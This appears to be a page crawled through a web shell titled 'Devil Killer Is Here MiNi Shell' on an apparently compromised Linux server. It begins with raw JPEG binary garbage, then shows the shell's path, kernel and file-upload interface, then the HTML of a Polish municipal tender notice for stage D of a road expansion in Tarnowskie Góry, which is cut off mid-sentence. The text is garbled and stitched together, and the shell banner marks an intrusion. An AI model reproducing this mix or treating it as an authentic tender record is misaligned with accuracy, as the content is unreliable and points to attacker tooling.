JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250617/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250617/0028200001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa układu drogowego w rejonie ulic: Królika, Szymały, Dolna, Lewka <br/>w Tarnowskich Górach” – etap D </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TARNOWSKIE GÓRY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Zarząd Ulic i Mostów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 273009357</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piastowska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnowskie Góry</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(032) 285-22-03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzuimzp@mzuimtg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.mzuim.tarnowskiegory.nv.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa układu drogowego w rejonie ulic: Królika, Szymały, Dolna, Lewka <br/>w Tarnowskich Górach” – etap D </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-05ff67ca-1dd8-41d0-903b-4f9cf357d4b7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00282000</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00034843/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Rozbudowa układu drogowego w rejonie ulic: Królika, Szymały, Dolna, Lewka w Tarnowskich Górach.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzuimtg.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu następujących środków komunikacji elektronicznej: <br/>1.1.	Platformy do obsługi postępowań przetargowych, dostępnej pod adresem: https://mzuimtg.ezamawiajacy.pl <br/>1.2.	Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy przetargowej – pod adresem: https://bip.mzuim.tarnowskiegory.nv.pl (zakładka „Zamówienia publiczne”.)<br/>1.3.	Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Otwarty Rynek Elektroniczny S.A. ul. Domaniewska 49, 02-672 Warszawa, nr telefonu infolinii +48 22 257 22 23, e-mail: oneplace@marketplanet.pl od poniedziałku do piątku (dni robocze) w godz. 9:00 - 17:00. <br/>2.	Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z Platformy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.2. Wymagania<br/> techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy<br/> przetargowej – pod adresem: https://bip.mzuim.tarnowskiegory.nv.pl (zakładka „Zamówienia publiczne”.) 1.3.<br/> Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Otwarty Rynek<br/> Elektroniczny S.A. ul. Domaniewska 49, 02-672 Warszawa, nr telefonu infolinii +48 22 257 22 23, e-mail:<br/> oneplace@marketplanet.pl od poniedziałku do piątku (dni robocze) w godz. 9:00 - 17:00. 2. Rejestracja i<br/> korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania<br/> z Platformy. 3. Dopuszczalne formaty przesyłanych danych: Zamawiający wskazuje jako format danych<br/> przesyłanych przez Wykonawcę środkiem komunikacji elektronicznych oświadczeń lub dokumentów format .pdf.<br/> Jednak Wykonawca może przygotować dokumenty i oświadczenia w każdym innym formacie określonym treścią<br/> rozporządzenia Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji<br/> elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania<br/> dokumentów elektronicznych (Dz. U. 2020 poz. 2452 z poźn. zm). 4. Kodowanie i oznaczenie czasu przekazania<br/> danych: czas zapisany jest w formacie YYYY MMDD HH:MM:SS. 5. Do połączenia używany jest szyfrowany<br/> protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność<br/> transmisji danych przesyłanych przez Internet. 6. W korespondencji kierowanej do Zamawiającego Wykonawcy<br/> powinni posługiwać się numerem przedmiotowego postępowania. 7. Komunikacja ustna dopuszczalna jest<br/> wyłącznie w toku negocjacji oraz w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą<br/> ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest udokumentowana (wymagana jest<br/> pisemna notatka z rozmowy lub negocjacji). 8. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o<br/> wyjaśnienie treści SWZ. 9. Zamawiający udzieli wyjaśnień zgodnie z art. 284 ustawy Prawo zamówień publicznych.<br/> Zmiany i wyjaśnienia treści SWZ udostępnione zostaną na Platformie przetargowej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO w celu związanym z<br/> postępowaniem o udzielenie zamówienia publicznego: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/> Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/> przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/> 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/> MZUiM w Tarnowskich Górach informuje, że: • administratorem Pani/Pana danych osobowych jest Dyrektor<br/> MZUiM Tarnowskie Góry, Adres: ul. Piastowska 8, 42-600 Tarnowskie Góry; e-mail: mzuim@mzuimtg.pl, Tel.<br/> (32) 285 22 03 Inspektor Ochrony Danych Osobowych MZUiM; Pan Andrzej Strycharz Kontakt mailowy:<br/> biuro@e-direction.pl Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/> celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie MZUiM.263.6.2025.TP2.RB<br/> pn.: Naprawa nawierzchni jezdni ulicy Stalmacha w Tarnowskich Górach prowadzonym w trybie podstawowym<br/> art. 275 pkt 2. • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/> zostanie dokumentacja postępowania w oparciu o art. 12 oraz art. 71-82 ustawy z dnia 11 września 2019 r. <br/>Prawo zamówień publicznych (Dz. U. z 2024r. poz.1320) dalej „ustawa Pzp”; • Pani/Pana dane osobowe będą<br/> przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/> udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/> trwania umowy; • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/> jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/> udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; •<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/> stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b, d<br/> lub e RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym<br/> mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych,<br/> gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Wystąpienie<br/> z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/579 nie ogranicza przetwarzania danych<br/> osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. W trakcie oraz po<br/> zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków,<br/> Strona 2<br/>o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679 wymagałoby niewspółmiernie dużego wysiłku,<br/> zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w<br/> szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. 2.<br/> Zamawiający wprowadza w formularzu oferty oświadczenie Wykonawcy następującej treści: Oświadczam/my, że<br/> wypełniłem/liśmy obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od<br/> których dane osobowe bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia<br/> publicznego w niniejszym postępowaniu.*</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZUiM.263.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem jest robota budowlana w ramach zadania pn.: „Rozbudowa układu drogowego w rejonie ulic Królika, Szymały, Dolnej, Lewka w Tarnowskich Górach” – etap D. <br/>2.	Zgodnie z dokumentacją projektową inwestycja podzielona jest na 4 etapy:<br/>A, B, C i D. <br/>2	Zakres budowy obejmuje branże drogową, kanalizacyjną, elektroenergetyczną oraz oświetlenie terenu dla etapu D zgodnie z załączoną mapką - odc. 1 i Przedmiarem robót stanowiącym załącznik nr 1a do SWZ. <br/>2.1	Zakres robót obejmuje w szczególności: <br/>-przebudowy chodników i ulic,<br/>-budowy elementów małej architektury,<br/>-remontu i uzupełnienia elementów odwodnienia nawierzchni dróg,<br/>-rozbudowy istniejącego oświetlenia ulicznego,<br/>-zabezpieczenia istniejącej infrastruktury technicznej, <br/>-wykonania tymczasowej i docelowej organizacji ruchu.<br/>2.2.	W projekcie rozbudowy układu drogowego przewidziano do zastosowania m.in. materiały:<br/>-dla ciągów pieszych: płyty granitowe, cięte, płomieniowane, szare, uzupełnione kostką granitową cięto – łupaną, płomieniowaną, szarą, <br/>-dla ciągów jezdnych: kostka granitowa cięta, płomieniowana, szara,<br/>-dla zatok postojowych: kostka granitowa, łupana, ciemnoszara,<br/>-dla zjazdów do posesji: kostka granitowa cięto – łupana, płomieniowana, szaro – ruda,<br/>-zawężenia przy miejscach postojowych: kostka nieregularna szaro – ruda, <br/>-wzmocnienie podłoża gruntowego geotkaninami na gruntach o umiarkowanej nośności sposobem mechanicznym - Geosiatka PET o oczkach 20x20 mm, wytrzymałość na rozciąganie min 110 kN/m.<br/>2.3	Suma nawierzchni kamiennych do wbudowania wynosi 2.292,45 m2, w tym:<br/>−	2.045,65 m2 nawierzchni z kostki kamiennej,<br/>−	246,80 m2 nawierzchni z płyt kamiennych.<br/>UWAGA! Zamawiający wymaga, aby na powierzchni powyżej 5 m2 podsypka cementowo – piaskowa 1:3 była pozyskana jako gotowa mieszanka z wytwórni i potwierdzona kartą materiałową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3	Zamówienie objęte prawem opcji:<br/>3.1.	Zamawiający - w związku z art. 441 ust. 1 ustawy Prawo zamówień publicznych – przewiduje możliwość skorzystania z prawa opcji. <br/>3.2.	Zakres prac dotyczący roboty na długości posesji Królika 16 obejmuje zgodnie z załączoną mapką – odc. 2, zgodni z Załącznikiem nr 1 b do SWZ _Przedmiar robót zakres opcjonalny. <br/>−	przebudowy chodników i ulic,<br/>−	remontu elementów odwodnienia nawierzchni dróg,<br/>−	zabezpieczenia istniejącej infrastruktury technicznej, <br/>−	wykonania tymczasowej i docelowej organizacji ruchu.<br/>3.3.	W projekcie rozbudowy układu drogowego na długości posesji Królika 16 przewidziano do zastosowania m.in. materiały:<br/>− dla ciągów pieszych: płyty granitowe, cięte, płomieniowane, szare, uzupełnione kostką granitową cięto – łupaną, płomieniowaną, szarą, <br/>−	dla ciągów jezdnych: kostka granitowa cięta, płomieniowana, szara,<br/>−	dla zjazdów do posesji: kostka granitowa cięto – łupana, płomieniowana, szaro – ruda,<br/>−	wzmocnienie podłoża gruntowego geotkaninami na gruntach o umiarkowanej nośności sposobem mechanicznym - Geosiatka PET o oczkach 20x20 mm, wytrzymałość na rozciąganie min 110 kN/m.<br/>3.4.	Suma nawierzchni kamiennych do wbudowania wynosi 155,10 m2, w tym:<br/>−	113,80 m2 nawierzchni z kostki kamiennej,<br/>−	11,20 m2 nawierzchni z płyt kamiennych,<br/>−	30,10 m2 przełożenia nawierzchni z kostki betonowej/kamiennej.<br/>UWAGA! Zamawiający wymaga, aby na powierzchni powyżej 5 m2 podsypka cementowo – piaskowa 1:3 była pozyskana jako gotowa mieszanka z wytwórni i potwierdzona kartą materiałową. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.	Zdolność techniczna lub zawodowa: <br/>Wykonawca musi wykazać, iż<br/>4.1	Samodzielnie wykonał należycie (w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończył) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w ramach dwóch zamówień (dwóch umów), zamówień odpowiadającym swoim przedmiotem robotom budowlanym będącym przedmiotem niniejszego zamówienia to znaczy: roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi/dróg, chodników, o nawierzchni z kostki granitowej o wartości nie mniejszej niż 900 000,00 zł brutto każda, o powierzchni nie mniejszej niż 1 000m2.<br/>4.2	dysponuje co najmniej 1 osobą (kierownikiem budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń, która pełniła funkcję Kierownika budowy nad co najmniej 3 robotami budowlanymi polegającymi na budowie lub przebudowie drogi o wartości robót nie mniejszej niż 900 000,00 zł brutto każda,<br/>lub odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów,<br/>oraz zrzeszoną/zrzeszonymi we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2023 r. poz. 551),<br/>lub spełniającą/spełniającymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2023 r. poz. 682 z późn.zm.) tj. osobą/osobami której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).<br/><br/>4.3	dysponuje co najmniej 1 osobą (kierownikiem robót kanalizacyjnych) posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej <br/>w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie wystarczającym do kierowania robotami instalacyjnymi w zakresie sieci wodociągowych i kanalizacyjnych,<br/>4.4	dysponuje co najmniej 1 osobą (kierownikiem robót elektrycznych) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów wystarczającym do kierowania robotami elektrycznymi.<br/>4.5	dysponuje co najmniej 1 osobą (kierownikiem robót teletechnicznych) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów wystarczającym do kierowania robotami teletechnicznymi.<br/>W przypadku zmiany osób wymienionych w punktach powyżej musi spełniać wymagania określone w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę na podstawie art. 274 ust. 1 ustawy, którego oferta została<br/> najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie od dnia wezwania, podmiotowych<br/> środków dowodowych, aktualnych na dzień ich złożenia: W celu potwierdzenia spełniania warunków udziału w<br/> postępowaniu, o których mowa w Rozdziale XXI pkt 4 niniejszej SWZ: 1) Wykaz robót budowlanych wykonanych<br/> nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz<br/> z podaniem ich rodzaju, wartości, ilości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/> wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały 